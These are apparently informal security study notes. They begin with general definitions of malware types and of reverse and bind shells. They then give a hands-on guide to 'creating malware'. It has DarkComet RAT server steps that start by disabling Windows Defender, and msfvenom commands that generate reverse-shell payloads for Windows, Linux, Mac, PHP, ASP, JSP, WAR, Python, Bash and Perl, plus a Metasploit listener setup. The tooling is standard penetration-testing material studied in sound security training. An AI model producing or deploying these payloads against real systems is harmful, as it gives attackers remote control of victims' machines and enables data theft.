· 6 years ago · Jan 08, 2020, 11:24 AM
1Malware
2what is ?
3mal + ware = malicious software
4designed to infiltirate and damage computers without the user consent.
5the term malware encompasses all the diff. types of threats to your computer such as :
6viruses, spywares , worms ,trojans etc.
7
8Purpose of Malware !!
9why do we need malware ? why were they created at first place ?
10> to do things without user's permission
11> to Steal files
12> to steal stored passwords
13> to hijack into computer
14> to hijack core computing functions
15> to monitor the activity of the user
16> to delete sensitive personal data
17> to encrypt sensitive data
18> to extort money
19
20Types of Malwares :
21
221. Virus: vital info resource under sieze
23 disrupts the normal functionality of computer
24
25 they are genearlly masked with executable files (i.e attached to exe files)
26 the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
27 Normally, the host program keeps functioning after it is infected by the virus.
28 although they can not replicate themselves outside the network . but has the ability to replicate and attach itself to other files locally
29 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
30 a disk, file sharing, or infected email attachments.
31
322. Worm:
33similar to viruses , replicate itself outside the n/w as well
34self replicating without host program and spreads without any human interaction or directives from the malware authors.
35worms are standalone software and do not require a host program or human help to propagate
36A worm enters a computer through a vulnerability in the system and takes advantage of
37file-transport or information-transport features on the system, allowing it to travel unaided
38
393. Trojan
40malicious s/w represents as valid
41> A Trojan is another type of malware named after the wooden horse that the Greeks used to infiltrate Troy.
42> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
43> After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
44 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
45> Trojans are also known to create backdoors to give malicious users access to the system.
46> Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.
47> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.
48
494. Spyware
50Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
51 or that asserts control over a device without the consumer's knowledge.
52
535. Ransomware
54kind of malware that is used to extort money by infecting the user.
55it encrypt all the files on a user's system using a strong encryption algoritham. Then demands for ranson to issue a decrypting key to retrieve / decrypt the user data .
56
576. Rootkit
58Programs that hide the existence of malware by intercepting (i.e., "Hooking") and modifying operating system API calls that supply system information.
59Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower to include a hypervisor, master boot record, or the system firmware.
60 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
61 Rootkits have been seen for Windows, Linux, and Mac OS X systems.
62
637. keyloggers
64special kind of Spyware
65The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
66Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware
67-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
68
69What are shells?
70Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.).
71
72Types of shells
731. Reverse shell
742. Bind shell
75
76Reverse shell
77A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
78
79Figure 1: Reverse TCP shell
80
81
82Bind shell
83Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.
84The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.
85
86Figure 2: Bind TCP shell
87There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
88 One thing which is common between all these shells is that they all communicate over a TCP protocol.
89-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
90
91Creating Malware
92RAT: Remote Administration tool
93Dark Comet Example
94---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
95disable windows defender
96open dark comet
97server module (create server) --> full editor
98process mutex --> threads
99n/w setting --> enter lhost lport here --> press add
100this will open a socket in attacker machine to listen for incoming connection
101listen for connection
102
103----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
104Msfvenom
105
106Creating Metasploit Payloads
107
108Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that
109 can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
110 Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.).
111 Execute and wait for the payload to be run. For the examples below it’s pretty self-explanatory but LHOST should be filled in with your IP address
112 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
113
114
115>how to create a malicous file ..will not be obfuscating the file/ hiding the file
116> will be using reverse tcp
117>reverse tcp connection is noisy and hence will be detected by windows defender
118>staging and encoding techn not covered
119
120List payloads
121msfvenom -l payload
122
123
124msfpayload + msfencode = msfvenom
125msf - metasploit f/w
126kali needed + winodows 10 (defender disabled )
127
128--browser may detect it downloading --anitvirus may detect it ---
129msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=124412 LPORT=53 -f exe -o filename
130
131-p payload
132-f format can be exe , apk , py,sh,etc.
133-o output file name
134LHOST local host/ listening host [ip addre of kali ]
135LPORT local port /listening port
136--arch for architecture
137--platform to explicitly specify victim platform
138before executing
139
140Handler on kali
141msfconsole
142use multi/handler
143set payload windows /x64/meterpreter/reverse_tcp
144show options
145set lport
146set lhost
147
148metasploit others
149
150
151os specific Binaries
152Linux
153msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
154
155Windows
156msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
157Mac
158msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
159Web Payloads
160PHP
161msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
162cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
163ASP
164msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
165JSP
166msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
167WAR
168msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
169Scripting Payloads
170Python
171msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
172Bash
173msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
174
175Perl
176msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
177Shellcode
178For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
179Linux Based Shellcode
180msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
181Windows Based Shellcode
182msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
183Mac Based Shellcode
184msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>